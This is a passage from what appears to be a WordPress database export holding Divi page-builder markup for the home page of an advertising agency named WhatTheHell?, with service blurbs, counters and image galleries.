button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:29:16','2020-08-07 20:29:16','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(626,1,'2020-08-07 20:29:28','2020-08-07 20:29:28','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"217x434\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" 